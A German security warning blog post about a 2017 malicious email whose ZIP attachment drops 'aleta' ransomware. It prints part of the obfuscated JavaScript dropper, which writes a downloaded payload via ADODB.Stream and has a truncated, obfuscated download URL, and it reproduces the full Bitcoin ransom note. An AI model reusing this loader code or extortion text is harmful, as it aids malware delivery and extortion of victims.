E-Mail ohne Betreff verschlüsselt Dateien in *.[[email protected]].aleta

Am Donnerstag, den 27. Juli 2017 wurde durch unbekannte Dritte die folgende E-Mail versendet. Da die E-Mail ohne Betreff und nur mit einer Anlage kommt, kann die E-Mail auch als deutsche oder englische E-Mail angesehen werden.

Entpacken Sie nicht das ZIP-Archiv! Das Script würde einen Verschlüsselungs- und Erpressungstrojaner (Ransomware) nachladen, der alle Dateien in *.[[email protected]].aleta umbenennt!

Achtung: Es handelt sich um eine bösartige E-Mail! Öffnen Sie daher nicht den Dateianhang!

Das in dieser E-Mail enthalten ZIP-Archiv trägt den  Dateinamen „EMAIL_4042189520_tdfa.zip“. Im ersten ZIP-Archiv ist ein zweites ZIP-Archiv enthalten, welches dann ein JavaScript enthält:

EMAIL_4042189520_tdfa.zip

2045047418326.zip

fE0ZQTmF7.js

Das JavaScript sieht wie folgt aus:

‚Mahito Ōba (大場 真人 Ōba Mahito, born March 4, 1961 in Hokkaidō, Japan) is a Japanese voice actor and narrator. He is a graduate of Tamagawa University and is affiliated with Aoni Production.[1]‘; var test = new Function(‚EgnhOX, RdCptUe‘, ‚RdCptUe.Open(); RdCptUe.Type = 1;  RdCptUe.Write(EgnhOX); RdCptUe.Position = 0;‘);’Mahito Ōba (大場 真人 Ōba Mahito, born March 4, 1961 in Hokkaidō, Japan) is a Japanese voice actor and narrator. He is a graduate of Tamagawa University and is affiliated with Aoni Production.[1]‘; var test = new Function(‚EgnhOX, RdCptUe‘, ‚RdCptUe.Open(); RdCptUe.Type = 1;  RdCptUe.Write(EgnhOX); RdCptUe.Position = 0;‘);’Mahito Ōba (大場 真人 Ōba Mahito, born March 4, 1961 in Hokkaidō, Japan) is a Japanese voice actor and narrator. He is a graduate of Tamagawa University and is affiliated with Aoni Production.[1]‘; function Hanjz(EgnhOX, fItA){ var RdCptUe = new ActiveXObject(‚ADODB.Stream‘);  test(EgnhOX, RdCptUe);    eval(‚RdCptUe.SaveToFile(fItA, 2);‘);   RdCptUe.Close();   return true;}’Mahito Ōba (大場 真人 Ōba Mahito, born March 4, 1961 in Hokkaidō, Japan) is a Japanese voice actor and narrator. He is a graduate of Tamagawa University and is affiliated with Aoni Production.[1]‘;function IwXYai(lpFS){try{   PXSIBkth(‚hON#YnLd#JPEZktON#YnLd#JPEZktON#YnLd#JPEZkpON#YnLd#JPEZk:ON#YnLd#JPEZk/ON#YnLd#JPEZk/ON#YnLd#JPEZkfON#YnLd#JPEZkiON#YnLd#JPEZklON#YnLd#JPEZkmON#YnLd#JPEZkcON#YnLd#JPEZkoON#YnLd#JPEZkfON#YnLd#JPEZkfON

Mit Textausschnitten sollen hier vermutlich Virenscanner in die Irre geleitet werden. Die Textausschnitte sind dabei aber als Kommentare enthalten, so dass der PC am Ende nur den Abschnitt in der Mitte ausführen würde. Dabei wird die Datei auf dem System z. B. als „40pbipbe2.jpg“ abgespeichert und dann in 40pbipbe2.exe“ umbenannt:

Virustotal zeigt für die Datei eine Erkennungsrate von 44/61.

Das Programm beginnt sofort mit der Verschlüsselung ganz vieler Dateien und benennt diese in *.[[email protected]].aleta um:

Desktop.ini.[[email protected]].aleta
Microsoft Access-Datenbank (neu).accdb.[[email protected]].aleta
Microsoft Excel-Arbeitsblatt (neu).xlsx.[[email protected]].aleta
Microsoft PowerPoint-Präsentation (neu).pptx.[[email protected]].aleta
Microsoft Publisher-Dokument (neu).pub.[[email protected]].aleta
Microsoft Word-Dokument (neu).docx.[[email protected]].aleta
Neue Bitmap.bmp.[[email protected]].aleta
Neue Bitmap.gif.[[email protected]].aleta
Neue Bitmap.jpg.[[email protected]].aleta
Neue Bitmap.png.[[email protected]].aleta
Neuer TAR-komprimierter Ordner.tar.[[email protected]].aleta
Neuer ZIP-komprimierter Ordner.tar.[[email protected]].aleta
Neuer Textdokument.txt.[[email protected]].aleta

Außerdem wird in den Verzeichnissen eine Datei „!#_READ_ME_#!.hta“ angelegt.

Diese wird am Ende auch automatisch angezeigt:

All your files have been encrypted!

All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail [email protected] in body of your message write your ID
You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.

Free decryption as guarantee

Before paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases, backups, large excel sheets, etc.)

How to obtain Bitcoins

The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click ‚Buy bitcoins‘, and select the seller by payment method and price.
https://localbitcoins.com/buy_bitcoins
Also you can find other places to buy Bitcoins and beginners guide here:
http: //www.coindesk.com/information/how-can-i-buy-bitcoins/

 

Attention!
– Do not rename encrypted files.
– Do not try to decrypt your data using third party software, it may cause permanent data loss.
– Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

 

Your ID

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Das Programm scheint auch nach der Verschlüsselung noch aktiv zu sein. Auch neu angelegte Dateien werden dadurch noch verschlüsselt.

Kommentar(e)

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert